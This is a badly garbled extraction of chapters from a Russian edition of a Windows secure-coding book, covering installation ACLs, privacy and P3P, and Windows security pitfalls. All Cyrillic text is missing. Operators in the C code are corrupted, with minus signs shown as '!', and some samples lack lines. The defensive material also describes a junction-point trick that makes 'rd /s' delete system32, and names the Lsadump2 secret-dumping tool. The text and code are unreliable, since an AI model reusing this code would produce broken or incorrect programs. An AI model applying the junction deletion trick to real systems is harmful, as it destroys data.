Internet
Security Scanner Internet Security Systems.
UNIX Windows NT, ,
.
.

, ,
,
21
547
DoS. ,
,
;

. ,
, ,

, , ,
.
, Windows 2000
.

,
, .

, ,
Windows 2000 ( ).
,
.
,
, CREATOR OWNER ().
?
.
,
.
. ,
HKEY_CUR
RENT_USER, HKEY_LOCAL_MACHINE.
, .
,
?

?
. Systems Management Server
(SMS) Remote Agent ,
, , .
( )
http://www.microsoft.com/technet/security/bulletin/fq00012.asp. ,
. ,
,

Local System,
.
Windows NT 4.0 AeDebug
. AeDebug ,
548
IV
.

, ,
( http://www.microsoft.com/Tech
Net/security/bulletin/fq00008.asp). ? .
, .
, Local System
DoS? ( ,
.) ,

!
,
SNMP (Simple Network Management Protocol) (
http://www.microsoft.com/TechNet/security/bulletin/fq00096.asp).
SNMP [ Security Not My
Problem ( )] ,
.
SNMP
(community string). ,
, ,
(
). , (sniffer),
, , .
, Para
meters, SNMP,
(, ). ,
, ,
SNMP SET , , .
, .
(
)
. , ,
, . ,
, .
:
.
,
. ,
(, ),
.
. ,
,
. ,
, .

. ,
21
549
:
. .
,
. , ,
: Program Files,
.
, Program Files , ,
, ,
NTFS.
,
. ,
ACL .
!

, .

, ,
.
, ,
,
.
, ,
[ Task Mana
ger ( )], .
, ,
!

(Security Configuration Editor)
Service Pack 4 Windows NT 4 Windows 2000
. Microsoft
(Microsoft Management Console, MMC) . ,
:

HKEY_LOCAL_MACHINE\Software. MMC
Security Templates ( ) Security Configuration and
Analysis ( ) (. 211).
(templates)
(security databases). ,
. Security Templates,
%<__>%\Security\Template
New Template ( ).
. , null.
. 212 MMC .
550
IV
. 211. / Security
Templates Security Configuration And Analysis
. 212.
MMC null
.
Security Configuration and Analysis
Open Database ( ).
; NewApp.sdb. Import
Template ( ) ,
. null (. 213).
.
,
. MMC (. 214),
null, Registry ()
Add Key ( ).
21
551
. 213. Import Template,

. 214.
Select Registry Key ( )

( ACL).
File System ( ).
. MMC
, . Notepad (),
:
[Unicode]
Unicode=yes
[Registry Values]
[Registry Keys]
"MACHINE\SOFTWARE\NewApp",0,"D:PAR(A;OICI;KA;;;BA)(A;CI;CCSWRC;;;WD) "
[File Security]
"E:\NewApp",0,"D:AR(A;OICI;FA;;;BA)(A;OICI;0x1f00e9;;;W D)"
[Version]
signature="$CHICAGO$"
Revision=1
552
IV
, (
E:\NewApp), %newapp_install%.
(. Secureco2\Chapter21\SecInstall).
/*
INF! ,
%newapp_install% ( )
.inf,
.
*/
#define UNICODE
#include <stdio.h>
/*
,
! ,
, ,
.
*/
class SmartHandle
{
public:
SmartHandle()
{
Handle = INVALID_HANDLE_VALUE;
}
~SmartHandle()
{
if(IsValid())
{
CloseHandle(Handle);
}
}
bool IsValid(void)
{
if(Handle != INVALID_HANDLE_VALUE &&
Handle != NULL)
{
return true;
}
else
{
return false;
}
}
21
HANDLE Handle;
};
/*
UNICODE?
wmain main,
UNICODE.
*/
int wmain(int argc, WCHAR* argv[])
{
SmartHandle hInput;
SmartHandle hOutput;
SmartHandle hMap;
WCHAR* pFile;
WCHAR* pTmp;
WCHAR* pLast;
DWORD filesize;
DWORD dirlen;
if(argc != 4)
{
wprintf(L" : %s [ ]", argv[0]);
wprintf(L" [ ] [ ]\n");
return !1;
}
dirlen = wcslen(argv[3]);
hInput.Handle = CreateFile(argv[1],
GENERIC_READ,
0,
//
NULL, //
OPEN_EXISTING,
// ,
FILE_ATTRIBUTE_NORMAL, //
NULL);
//
if(!hInput.IsValid())
{
wprintf(L" %s\n", argv[1]);
return !1;
}
DWORD highsize = 0;
filesize = GetFileSize(hInput.Handle, &highsize);
if(highsize != 0 || filesize == ~0)
{
// 4
// INF! ???
553
554
IV
wprintf(L" %s .\n", argv[1]);

return !1;
}
/*
,

*/
hOutput.Handle = CreateFile(argv[2],
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
NULL);
if(!hOutput.IsValid())
{
return !1;
}
//
//
//
//
, ,
.
,
, .
hMap.Handle = CreateFileMapping(hInput.Handle, // .
NULL,
// .
PAGE_READONLY, // .
0,
//
0,
// !
// .
NULL);
// .
if(!hMap.IsValid())
{
return !1;
}
// .
pFile = (WCHAR*)MapViewOfFile(hMap.Handle,
FILE_MAP_READ, 0, 0, 0);
if(pFile == NULL)
{
return !1;
21
}
//
// .
pTmp = pLast = pFile;
DWORD subst_len = wcslen(L"%newapp_install%");
while(1)
{
DWORD written, bytes_out;
pTmp = wcsstr(pLast, L"%newapp_install%");
if(pTmp != NULL)
{
// .
// ?
bytes_out = (pTmp ! pLast) * sizeof(WCHAR);
if(!WriteFile(hOutput.Handle, pLast, bytes_out,
&written, NULL) || bytes_out != written )
{
wprintf(L" %s\n", argv[2 ]);
return !1;
}
// %newapp_install%
// .
if(!WriteFile(hOutput.Handle, argv[3],
dirlen * sizeof(WCHAR), &written, NULL) ||
dirlen * sizeof(WCHAR) != written)
{
UnmapViewOfFile(pFile);
return !1;
}
pTmp += subst_len;
pLast = pTmp;
}
else
{
//
bytes_out = (BYTE*)pFile + filesize ! (BYTE*)pLast;
if(!WriteFile(hOutput.Handle, pLast, bytes_out,
&written, NULL) || bytes_out != written)
{
555
556
IV
wprintf(L" %s \n", argv[2]);

return !1;
}
else
{
// ! !
break;
}
}
}
//
// .
return 0;
}
, ? , ,
inf.
,
. ,
, .
[e:\]secedit /configure /db NewApp.sdb /cfg out.inf /areas

REGKEYS FILESTORE /verbose
,
.
Out.inf ,
. (,
)
INF,
. ,
Windows NT 3.51 4 ,
,
!
API-
: ,
.
,
Windows NT.
API . Windows NT 4
API.
,
, . ,
AddAccessAlowedAce
ACE. ACE ,
21
557
AddAce, . ( AddAccess
AlowedAceEx, ACE,
Windows 2000 .)
API
,
http://www.windowsitsecurity.com/Articles/Index.cfm?Article
ID=9696. API,
.
: DACL

. DACL
.
, . DACL
. ACE
ACE.
Windows Installer
, Windows,
, Microsoft Platform SDK.
Platform SDK ,
, SDK ,
Guidelines for Authoring Secure Installations (
).
, .
,

.
Windows Installer
LockPermissions, ,
.
,
(private), (public) (restricted public).
,
, ,
.
.
Windows .
Windows Installer
. :
+ ,
.
. ,
,
.
558
IV
,
;
, .

.
,

. ,
,
Open
.

,
. Platform SDK.

(transforms).
. (
, ),
.
(custom actions)
, . ,
,
Windows Installer,
.
, ,
, msidbCustom
ActionTypeNoImpersonate
.
Windows Installer
, ,
,
. Windows Installer
, .
,
.
,
,
.
,
.
22

* (privacy)
. ,
.
,
,
, ,
.
, ,
.
, , ,
, .
!
. ,
.
, Porsche
? ,
. .

. ,
, ,
* . . .
560
IV
.
, ,
.
, .

,
. ,
. ,
. :
,
.
. ,
,
,
. :
. , .

.
.
, Web
. ,
. , ,

.
,
.
, .
, .

. ,
.
,
Records, Computers and the Rights of Citizens (,
), ,
1973 . (http://aspe.hhs.gov/datacncl/1973privacy/
tocprefacemembers.htm). , ,
, . 1998 .
22
561
Fair Information Practices (

) (http://www.ftc.gov/reports/privacy3/fairinfo.htm).

, ,

.

(personally identifiable information,
PII) ,
. PII .
.
, .
TCP/IP
PII, .
PII,
.

1998 . (http://
www.cdt.org/privacy/eudirective/EU_Directive_.html), ,
PII.
PII ,
.
, .
2000 .
,
. ,
, .

(Safe Harbor Principles, http://www.export.gov/safeharbor/)
,
. , ,
,
, .
, ,
, . Web
(privacy statement),
.
, ,
.
, ,
, , ,
562
IV
, Web ,
.

. ,
,
.
, ,
,
. ,
,
,
. ,

. , CRM (Customer Relationship Mana
gement ),
(,
). ,
.

.
. ,
.
,
.
,
.
, ,
.
, ,
,
, .
,
.
, .

.
22
563

. ,
.
,

. ,
.

.
Web .
, .

, .
,

. . 221 ,
: BBBOnline (http://www.bbbonline.com), ESRB (http://
www.esrb.org/wp_join.asp) TRUSTe (http://www.truste.org/programs/ pub_how_to_
join.html).
. 221.

.
. 222
.
22-1.
URL-

(Computer
Fraud and Abuse Act, CFAA)

,
,

http://www4.law.cor
nell.edu/uscode/18/
1030.html
. . .
564
IV
22-1.
()
URL-

(GrammLeach Bliley Act,
GLBA)

.

,

http://www.senate.gov/
~banking/conf/

(Health Information
Portability Accountability
Act, HIPAA)

.

,

http://cms.hhs.gov/hipaa/
(Childrens Online Privacy

Protection Act, COPPA)

13
http://www.ftc.gov/opa/
1999/9910/childfinal.htm

,
.
, .
, , ,
.
.

.
, ,
. PII, ,
.

, . ,
,
. , :
;
;
;
,
;
:
Web;
22
565
;
.

(Chief Privacy Officer, CPO)
(privacy advocate) .

.
(Council of Chief Privacy Officers, http://www.conference
board.org/search/ dcouncil.cfm?councilsid=173) .
. 222
. CPO ,

.
, CPO
, .

. 222.

CPO ,
.

.
, , ,
.
, ,
. CPO
,
,
.
566
IV

, CPO.
, ,
.
:
;
;
;
,
;

;
,
.
,

Web ,
.
. ,
. ,
. , ,
, ,

. , ,
, .

,

.
, ,
(. 223).

, , ,
.
Web, ,
P3P (Platform for Privacy
Preferences) ( ). ,
cookie, ,
, , ,
.
.
22
567
,
,
. (,
) ,
.
.

,
SQM cookie-
. 223.
P3P

.
,
. ,
, .

.
,
.

1.
,
,

. ,
. ,
. . .
568
IV
, .
,
:
;
;
;
;

;
, ,
;
;
?
1.1.
,
: Web?
, ,
. ,
? , ?
, , .
1.2 Web-
Web,
: Web ?
?
? cookie,
. ,
.
. Web P3P?

, .
,
.
.
. ,
, .

Web .
, .
22
569
,
,
. ,
.
.
,
. Web
TRUSTe (http://www.truste.org/ bus/pub_resourceguide.html)
, .
Microsoft http:/
/www.microsoft.com/info/privacy.htm.
P3P
Platform for Privacy Preferences (P3P) (http://www.w3.org/P3P) ,
W3C (World Wide Web Consortium)
Web ,
. ?
Internet Explorer 6,
(. 224).
P3P.
. 224.
Internet Explorer 6
, Web
.

, .
cookie .
P3P Web. Web
P3P ,
(Medium) . P3P
(.
P3P).

.
.
. ,
,
.
.
P3P
, P3P Web.
, P3P, ,
570
IV
. Internet Explorer 6 Web

Privacy Report ( ) View (). . 225
, Web,
.
. 225.
P3P
Web, P3P, ,
. 226. , .
TRUSTe
.
. 226.
P3P
P3P
. XML
. P3P.xml W3C,
Web. , Microsoft
http://www.microsoft.com/w3c/p3p.xml. :
22
571
<META xmlns="http://www.w3.org/2000/12/p3pv1">
<POLICY!REFERENCES>
<POLICY!REF about="Policy.xml">
<INCLUDE>\*</INCLUDE>
<COOKIE!INCLUDE name="*" value="*" domain="*" path="*"/>
</POLICY!REF>
</POLICY!REFERENCES>
</META>
Web, Internet Explo
rer 6 W3C Web, P3P.xml,
POLICYREF, XML
. ,
. .
XML .
discuri Web.
Internet Explorer 6 here.
Internet Explorer 6 .
Web
, .
. Web
, .

.
http://www.w3.org P3P.
<POLICY xmlns="http://www.w3.org/2000/12/p3pv1"
discuri="policy.htm"
opturi="http://msdn.microsoft.com/privacy">
<ENTITY>
<DATA!GROUP>
<DATA ref="#business.name">Microsoft</DATA>
<DATA ref="#business.contact!info.postal.street">One Microsoft Way
</DATA>
<DATA ref="#business.contact!info.postal.city">Redmond</DATA>
<DATA ref="#business.contact!info.postal.stateprov">WA</DATA>
<DATA ref="#business.contact!info.postal.postalcode">78052</DATA>
<DATA ref="#business.contact!info.postal.country">USA</DATA>
<DATA ref="#business.contact!info.online.email">michael</DATA>
<DATA ref="#business.contact!info.telecom.telephone.intcode">1
</DATA>
<DATA ref="#business.contact!info.telecom.telephone.loccode">425
</DATA>
<DATA ref="#business.contact!info.telecom.telephone.number">
8828080</DATA>
</DATA!GROUP>
</ENTITY>
<ACCESS><nonident/></ACCESS>
<STATEMENT>
<PURPOSE><admin/><develop/></PURPOSE>
572
IV
<RECIPIENT><ours/></RECIPIENT>
<RETENTION><stated!purpose/></RETENTION>
<DATA!GROUP>
<DATA ref="#dynamic.clickstream.server"/>
<DATA ref="#dynamic.http.useragent"/>
</DATA!GROUP>
</STATEMENT>
<STATEMENT>
<PURPOSE><pseudo!analysis required="opt!in"/></PURPOSE>
<RECIPIENT><other!recipient/></RECIPIENT>
<RETENTION><indefinitely/></RETENTION>
<DATA!GROUP>
<DATA ref="#user.home!info.postal.postalcode">
<CATEGORIES><demographic/></CATEGORIES>
</DATA>
</DATA!GROUP>
</STATEMENT>
</POLICY>
Web, ,
. Internet Explo
rer 6 Privacy Report
View. Web
. , TRUSTe (http://www.truste.org/bus/pub_re
sourceguide.html).
. 227.
Internet Information Services (IIS)
. ,
Internet Explorer 6 ,
.
XML, ,
P3P. ( http://www.w3.org/TR/P3P/#compact_policies).
. 227 XML.
22
573
P3P
. P3P Web
(http://msdn.microsoft.com/workshop/security/privacy/
overview/createprivacypolicy.asp).
Internet Explorer 6 P3P .

, ,
, ,
.
. ,

Web, .
Help (),
.
(software
development kit, SDK), Privacy Policy (
) , ,
, Web. Privacy Settings
( ) DLL,
, SDK.
. 228
Microsoft Windows Media Player 9 beta,
.
. 228.
Privacy Options
, ,
.
, ?
CRM.
. ,
574
IV
?

,
, (. 2210).
. 229.

. 2210.
, Web,
, .
, ,
?
, ,
,
.
22
575
, . ,
, .
, ! (:
!) , ,
, Web , ,
.
. ,
:

.

, ,
HCKU
.

Windows Media Player 7 ,
DVD Microsoft. :
,
. , , ,
, , .
,
, .
, ,
, .
,

,
.

,
.

, : ,
?
.
,
: ?
, ,
,
. , ,
, , .
,
.
576
IV

,
, . ,
,
.
.
. ,
,
. ,
. ,
. . . 2211 ,
,
. , ,
.
. 2211.

,
.
. ,
.
22
577
. , .
: ,
, , .

,
,
.
,
.

,
. , .
?
; ,
.

: ,
. ?
,
?
, . ,
. ,
, , . ,
,
.
, ,
.
. 2212 ,
.
SSL/TLS Web. Web
, IPSec.
,
. .
,
EDI (Electronic Data Interchange)
, .
.
. ,
.
.
578
IV
IPSec
IPSec
EDI
SSL/TLS
Web-
SSL/TLS
. 2212.

,
, .
,
.
.
,
. , ,
. ,
,
.
23

.
, ,
.
!

, ,
,
. , ,
. ,
: stuff.txt c:\secrets
tuff\docs, .
, ,
, ,
. : ,
,
, .
,
, .
580
IV

, UNIX, Microsoft
Windows NT .
,
. ?
,
Microsoft Windows ,
.
. ,
, SYSTEM,
. ,
, .
Windows
; , ,
, .
, ,
. Windows
.
,
, , .
,
, .
, SYSTEM
OpenWindowStation GetThreadDesktop,
.
Windows
.

, , RPC, ,
COM
(MessageBox) MB_SERVICE_NOTIFICATION.
.
, ACL ,
, (127.0.0.1).
,
:
,
LocalSystem
Security Configuration
Manager [Log on As ( ) Allow Service to interact with desktop
23
581
( ) HKLM\
CCS\Services\MyService\Type 0x0100 = 0x0100,
CreateService dwServiceType, SERVICE_INTERACTIVE_PROCESS SERVI

CE_INTERACTIVE_PROCESS,
MessageBox, uType (MB_DEFAULT_DESK

TOP_ONLY | MB_SERVICE_NOTIFICATION | MB_SERVICE_NOTIFICATION_NT3X)
,
OpenWindowStation (winsta0, ...), SetProcessWindowStation, OpenDesk

top(Default,) , , SetThreatDesktop
,
LoadLibrary GetProcAddress
.
CreateProcess , SYSTEM,
STARTUPINFO.lpDesktop
(Winsta0\Default).
,
Create
ProcessAsUser.

, .

.
LocalSystem
LocalSystem .
.
Windows 2000 , Windows 2000,
. ,
. ,
,
, Windows 2000
. API,
(, LogonUser), Windows XP
. LocalSystem,
,
. LocalSystem
: .
LocalSystem ,
.
582
IV

Network Service ( ) ,
Windows XP. ,

LocalSystem. LocalSystem,
( , ,
).
.
.
LocalService
LocalService Network Service,
. ,
. LocalSystem,
.

,
, , . ,
, ,
.
. ( )
Internet Security Systems, ,
. ,
Windows NT. ,
, .
,
,
.
,
,
.
, , ,
.
, ! , .

: !
, ,
.

, , ,
, Lsadump2, (Todd
Sabin) BindView. ,
. , , ,
, ,
23
583

. , Lsa
dump2 lsass. ,
.
,
.
.
,
, , ,
. ,
.
, ,
.
,
,
. ,
.

.
,
, ; ,
,
.
.
,
, .

.
, . ,
, ,
.
, .

.

, ,
, ,
. , Web
Server:. , ,
.
.
, .
584
IV
Web IIS 5
URLScan (http://www.microsoft.com/windows2000/downloads/recommended/
urlscan/default.asp).

, :
, ,
, .
, Ism.dll (,
.htr) IIS 5, , Splat.htr,
Error: The requested file could not be found ,
Ism.dll HTR.
, Ism.dll 404,
Web.
-

,
. 19.
!
,
, . ,
A, B, A
. ,

.

, . ,
. ,
. .

. , ,
.
, ,
Driver Verifier
Ntoskrnl.exe Hal.dll ,
.
Windows DDK, ,
23
585
.
Strsafe.h (. 5).
NTStrsafe.h
Windows XP SP 1 DDK (http:// www.microsoft.com/ddk/relnote
XPsp1.asp).

, ,
FILE_DEVICE_SECURE_OPEN.
, ,
. /
.
, DACL
, INF .
. AddReg [ClassIns
tall32] [DDInstall. HW] INF. , INF
, WHQL (Windows Hardware Quality Labs),
.
IoCreateDeviceSecure ( DDK
Microsoft Windows .NET Server 2003 Windows XP SP1)
,
(raw) ( ,
). Windows 2000
; Wdmsec.h
Wdmsec.dll.
, /
(input/output control, IOCTL) FILE_ANY_ACCESS.
.
IOCTL
IoValidateDeviceIoControlAccess ,
.
Windows 2000 Wdmsec.h.
Windows (Windows Management Instrumentation,
WMI) ,
: , .
Windows XP WMI
GUID , Windows .NET Server 2003
.
WMI , [DDInstall.WMI] ( DDK
Windows .NET Server 2003 Windows XP SP1) AddReg
SDDL.

.
, .
, .
586
IV
:
, ,
, . ,
, OBJ_KER
NEL_HANDLE .
,
.
,
. ,
. ,
, , ,
. , ,
,
,
, Zw*.
, ObReferenceObjectByHandle,
.
, ObReferenceObjectByHandle,
(
, ,
).

,
. , Windows NT
,
.
.
.
ExAllocatePoolWithQuotaTag, try/except.
,
.

. KeAc
quireSpinLock, .
, .
,
* , Zw,
ZwSignalAndWaitForSingleObject. . .
23
587
interlocked ExInterlockedInsertHeadList.
(deadlock).

.
, ,
IRQL_DISPATCH_LEVEL .
.

, , ,
.
, , ,
,
.
,
. ,
, , ,
, .
,
try/except , MmProbeAndLockPages
ProbeForRead,
try/except. .
NTSTATUS AddItem(PWSTR ItemName, ULONG Length, ITEM *pItem) {

NTSTATUS status = STATUS_NO_MORE_MATCHES;
try {
ITEM *pNewItem = GetNextItem();
if (pNewItem) {
// Probe! .
// LARGE_INTEGER.
ProbeForWrite(pItem, sizeof ITEM,
TYPE_ALIGNMENT(LARGE_INTEGER));
RtlCopyMemory(pItem, pNewItem, sizeof ITEM);
status = STATUS_SUCCESS;
}
} except (EXCEPTION_EXECUTE_HANDLER) {
status = GetExceptionCode();
}
return status;
}
, , :
,
/ (I/O request packet, IRP)
(ioStack>Parameters.Read.Length).
, .
588
IV

/:
/: Irp>MdlAddress NULL;
/: Irp>AssociatedIrp. SystemBuffer ;
/: Irp>UserBuffer ,
.
, / ProbeForRead ProbeForWrite

!
, / Windows ,
Irp>IoStatus. Information, , Irp>IoStatus. Status
. , Irp>IoStatus.Infor
mation, / ,
,
/. .
Irp>IoStatus. Status , ,
IoStack>Parameters.Read.Length. .
: 4 ,
8 ,
8 , / 4 8
4 .
, 8 4
, .
, /
, Irp>IoStatus.Status
( 0x800000000xBFFFFFFF).
(0xC00000000xFFFFFFFF) / .
IRP
. , STATUS_BUFFER_OVERFLOW (
), STATUS_BUFFER_TOO_SMALL (
).
/ (Memory Descrip
tor List, MDL),
.
,
.
,
.
,
,

.
,
, .
23
589
IOCTL FSCTL (File System

Control) ( ,
, ,
). ,
, . .
METHOD_NEITHER IOCTL FSCTL:
Inbuffer, InBufLen, OutBuffer OutBufLen
/ , .
METHOD_NEITHER METHOD_BUFFERED,
METHOD_IN_DIRECT METHOD_OUT_DIRECT. :
!
/.
,
IOCTL.
METHOD_NEITHER.
( NULL)
,
, , ,
.
IRP-
,
IRP
/, / (IRP_MJ_CLEA
NUP). : IRP
. ,
IRP (
), .
.
/,
, ,
/ . ,
, ,
.
, ,
.
IRP ,
. IRP
IoCsqXxxx, CSQ.H.
IoSetStartIoAttributes
TRUE NonCancellable. ( Windows XP
.) ,
(startIo) IRP. ,
, ,

.
590
IV

:
?
?
.
. ( ,
, ).
// !
// , ( szParam)
// .
HFILE hFile = CreateFile(szParam,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
NULL);
if (hFile != INVALID_HANDLE_VALUE) {
// .
}
,
.

,
. ,
, ,
. , ,
.
,

,
. :
.
,
, .
,
, .
,
23
591
.
. .

X.509 Microsoft Internet Explorer 5:
(. 231).
. 231.
Internet Explorer 5
, ,
: !
, ! ,
, No ,
Yes .
, Yes, . ,
: ,
, .

CreateProcess
CreateProcess, CreateProcess
AsUser, CreateProcessWithLogonW, ShellExecute WinExec, ,
? CreateProcess,
.
,
,
, , .
.
CreateProcess , , lpAppli
cationName lpCommandLine. ,
. Platform
SDK , lpApplicationName NULL,
, lpCom
mandLine. ( ) ,

. .
CreateProcess(NULL,
"C:\\Program Files\\MyDir\\MyApp.exe !p !a",
...);
592
IV
Program Files. Create

Process NULL,
, , . C:\Program.exe ,

Files\MyDir\MyApp.exe p a.
,
,
.
Program.exe, ,
CreateProcess, .
. , Create
Process, ,
.
MyApp.exe, : C:\Temp C:\winnt\system32. ,
MyApp.exe system32, CreateProcess .
, CreateProcess, C:\Temp,
MyApp.exe. ,
system32,
, (C:\Temp) , ,
. Platform SDK
CreateProcess ,
.
CreateProcess,
, .
NULL lpApplicationName
NULL lpApplicationName,

,
.
lpApplicationName,
lpCommandLine.
CreateProcess:
CreateProcess("C:\\Program Files\\MyDir\\MyApp.exe",
"MyApp.exe !p !a",
...);

lpCommandLine
lpApplicationName NULL,
,
:
CreateProcess(NULL,
"\"C:\\Program Files\\MyDir\\MyApp.exe\" !p !a",
...);
23
593
( ) ,
CreateProcess ?

, ; ,
. Microsoft Windows
16 ,
. DLL
, DLL.
, ,
, DLL,
.
,
.
.dangersec. , ,
:
.def:
SECTIONS
.dangersec READ WRITE SHARED
a .h* .c*:
#pragma comment(linker, "/section:.dangersec, rws")

!SECTION:.dangersec, rws
, HOWTO: Share Data Between Different Mappings of a DLL
Knowledge Base ,
.

CreateFileMapping ACL.

,
,
, .
,
, SYSTEM ,
,
. .
,
.
594
IV
Microsoft Windows .NET Server 2003,

,
. 7.
: RpcImper
sonateClient, ImpersonateNamedPipeClient, ImpersonateSelf, SetThreadToken, Impersonate
LoggedOnUser, CoImpersonateClient, ImpersonateAnonymousToken, ImpersonateDdeClient
Window ImpersonateSecurityContext.
, .

\Program Files
7, , , .
\Program Files , ACE
,
.
.
, : %<_
>%\My Documents, .
, \Documents
Settings\All Users\Application Data\<_>.
\Program Files ,
, Windows 95 Windows NT ,
, .
HKEY_LOCAL_MACHINE ; .
HKLM
\Program Files, HKEY_LOCAL_MACHINE
, ACL
[ Everyone ()]
.
HKEY_CURRENT_USER, .
FULL_CONTROL ALL_ACCESS
Windows NT 3.1 1993 .
, : ,
, ,
.
, ACL ,
.

,
Create. , ,
CreateNamedPipe CreateMutex, :
,
23
595
, ,
,
! ,
,
.
exploit
, ,
.
Microsoft Telnet,
, Predictable Name Pipes Could Enable Privilege Elevation
via Telnet (
Telnet) http://www.microsoft.com/technet/
security/bulletin/MS01031.asp. Telnet
, .
, Telnet
, , .
: ,
, .
,
, .
#ifndef FILE_FLAG_FIRST_PIPE_INSTANCE
# define FILE_FLAG_FIRST_PIPE_INSTANCE 0x00080000
#endif
int fCreatedOk = false;
HANDLE hPipe = CreateNamedPipe("\\\\.\\pipe\\MyCoolPipe",
PIPE_ACCESS_INBOUND | FILE_FLAG_FIRST_PIPE_INSTANCE ,
PIPE_TYPE_BYTE,
1,
2048,
2048,
NMPWAIT_USE_DEFAULT_WAIT,
NULL); //
if (hPipe != INVALID_HANDLE_VALUE) {
// , !
CloseHandle(hPipe);
fCreatedOk = true;
} else {
printf(" CreateNamedPipe %d", GetLastError());
}
return fCreatedOk;
FILE_FLAG_FIRST_PIPE_INSTANCE:
,
GetLastError . Windows 2000 SP 1.

, .
596
IV
.
,
DoS.
, ,
. ,
, .
HANDLE hMutex = CreateMutex(

NULL,
// .
FALSE,
"MyMutex");
if (hMutex == NULL)
printf(" CreateMutex: %d\n", GetLastError());
else
if (GetLastError() == ERROR_ALREADY_EXISTS )
printf("CreateMutex ** \n") ;
else
printf("CreateMutex \n");
, , ,

.
,
, .
,
.
, .
CreateFile
Win32 CreateFile ,
, .
,
, , ! , ,
CreateFile, ,
GetFileType. ,
CreateFile
, ,
.
, ,
. ,
, (
)
.
dwFlagsAndAttributes
:
23
597
HANDLE hFile = CreateFile(pFullPathName,

0,0,NULL,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
NULL);
.
FILE_FLAG_OPEN_NO_RECALL, .

.
! , ,
, CreateFile.

UNIX ,
.
Windows , ,
. ,
Windows.
, MandrakeUpdate
LinuxMandrake. , MandrakeUpdate,
/tmp.
. http://www.secu
rityfocus.com/bid/1567.
/tmp XFree86 4.0.1. ,

.
. http://www.securityfocus.com/bid/1430.
:
;
, ;
,
,
.
Windows
, GetTempPath GetTempFileName.
TMP TEMP
GetTempPath.
: GetTempFileName
, GetTempPath
, ACL.
, ,
,
598
IV
( C:\Temp) . Windows XP
, LocalService
NetworkService, .
, .
GetTempFileName ,
, !
GetTempFileName ,
.
(. Secureco2\Chapter23\CreatTempFile)
, ,
.
HANDLE CreateTempFile(LPCTSTR szPrefix) {
// .
TCHAR szDir[MAX_PATH];
if (GetTempPath(sizeof(szDir)/ sizeof(TCHAR), szDir) == 0)
return NULL;
// .
TCHAR szFileName[MAX_PATH];
if (!GetTempFileName(szDir, szPrefix, 0, szFileName))
return NULL;
// .
HANDLE hTemp = CreateFile(szFileName,
GENERIC_READ | GENERIC_WRITE,
0,
// .
NULL, //
CREATE_ALWAYS,
FILE_ATTRIBUTE_TEMPORARY |
FILE_FLAG_DELETE_ON_CLOSE,
NULL);
return hTemp == INVALID_HANDLE_VALUE
? NULL
: hTemp;
}
int main() {
BOOL fRet = FALSE;
HANDLE h = CreateTempFile(TEXT("tmp"));
if (h) {
//
// .
//
23
599
CloseHandle(h);
}
return 0;
}
CreateFile. . 231 ,
.
23-1. CreateFile,

CREATE_ALWAYS

. , ,

,
.

FILE_ATTRIBUTE_TEMPORARY
FILE_FLAG_DELETE_ON_CLOSE

.
,

MoveFile
. , ,
FILE_FLAG_DELETE_ON_CLOSE.

Indexing Service ( ), ,
For fast searching, allow Indexing Service to index this folder (
) (. 232).
. 232.
, ,
,
. , CryptoAPI (.
Secureco2\Chapter23\CreateRandomPrefix).
600
IV
// CreateRandomPrefix.cpp
#define PREFIX_SIZE (3)
DWORD GetRandomPrefix(TCHAR *szPrefix) {
DWORD dwErr = 0;
TCHAR *szValues =
TEXT("abcdefghijklmnopqrstuvwxyz0123456789");
if (CryptAcquireContext(&hProv,
NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT) == FALSE)
size_t cbValues = lstrlen(szValues);
for (int i = 0; i < PREFIX_SIZE; i++) {
DWORD dwTemp;
CryptGenRandom(hProv, sizeof DWORD, (LPBYTE)&dwTemp);
szPrefix[i] = szValues[dwTemp % cbValues];
}
szPrefix[PREFIX_SIZE] = '\0';
if (hProv)
return dwErr;
}
EFS

(EFS), ,
Microsoft. ,
, %TEMP%,
.
EFS , ,
. EFS,
:
;
( dwFlagsAnd
Attributes CreateFile FILE_ATTRIBUTE_SYS
TEM);
, %TEMP% ( GetFileAttributes),
.
23
601

Windows 2000, NTFS (junc
tion). UNIX,
.
Linkd.exe, Windows Resource Kit.
,
. ,
. ,
, findstr /s.
Linkd.exe,
, c:\users\attacker c:\.
, c:\users, .
,
(, rd /s). ,
c:\temp\tempdir c:\windows\system32.
,
, rd /s c:\temp.
, ,
,
.
(reparse points),
,
FILE_REPARSE_POINT. ,
FILE_REPARSE_POINT.
, GetFileAttributes lpFindFileData>dwFileAttributes
FindFirstFile.
,
,
, .
:
, .
,
.
Web,

DHTML, .
, , Perl

.

, .
, Windows NT Windows XP IP
602
IV
. ,
TcpIp,
,
. IP
,
IP.
, ,
.

, , (
) .
,
. Microsoft
Visual Studio .NET, , ,
. , .
, ,
.
:
. ,
.
Windows Security Push
, Platform SDK:
Microsoft? : ,
.
!

,
, ,
: . ,
, .
:

. ? ,
,
? , !
,
. ,

,
. ,
.
23
603
,

,

,
.
,
, , ,
, .
. ,
C++ C#,
, .
. : , , C++,
COM .NET,
.

SID
, ,
,
,
(SID).
SID . SID,
, ?
PSID GetAdminSID() {
BOOL fSIDCreated = FALSE;
SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
PSID Admins;
fSIDCreated = AllocateAndInitializeSid(
&NtAuthority,
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&Admins);
return fSIDCreated ? Admins : NULL;
}
BOOL fIsAnAdmin = FALSE;
PSID sidAdmin = GetAdminSID();
if (!sidAdmin) return;
if (GetTokenInformation(hToken,
TokenGroups,
ptokgrp,
dwInfoSize,
604
IV
&dwInfoSize)) {
for (int i = 0; i < ptokgrp!>GroupCount; i++) {
if (EqualSid(ptokgrp!>Groups[i].Sid, sidAdmin)){
fIsAnAdmin = TRUE;
break;
}
}
}
if (sidAdmin)
FreeSid(sidAdmin);
Windows 2000
. ,
, , SID
(denyonly SID),
. , TRUE ,
,
SID.
7.
:
for (int i = 0; i < ptokgrp!>GroupCount; i++) {

if (EqualSid(ptokgrp!>Groups[i].Sid, sidAdmin) &&
(ptokgrp!>Groups[I].Attributes & SE_GROUP_ENABLED)){
fIsAnAdmin = TRUE;
break;
}
}
,
Windows 2000 CheckTokenMember
ship. , ACL,

.

Windows, 14 . Win
dows 2000 14 ,
Windows 2000 256
( NULL).
Windows XP Stored User
Names and Passwords ( ) (. 9).
_alloca
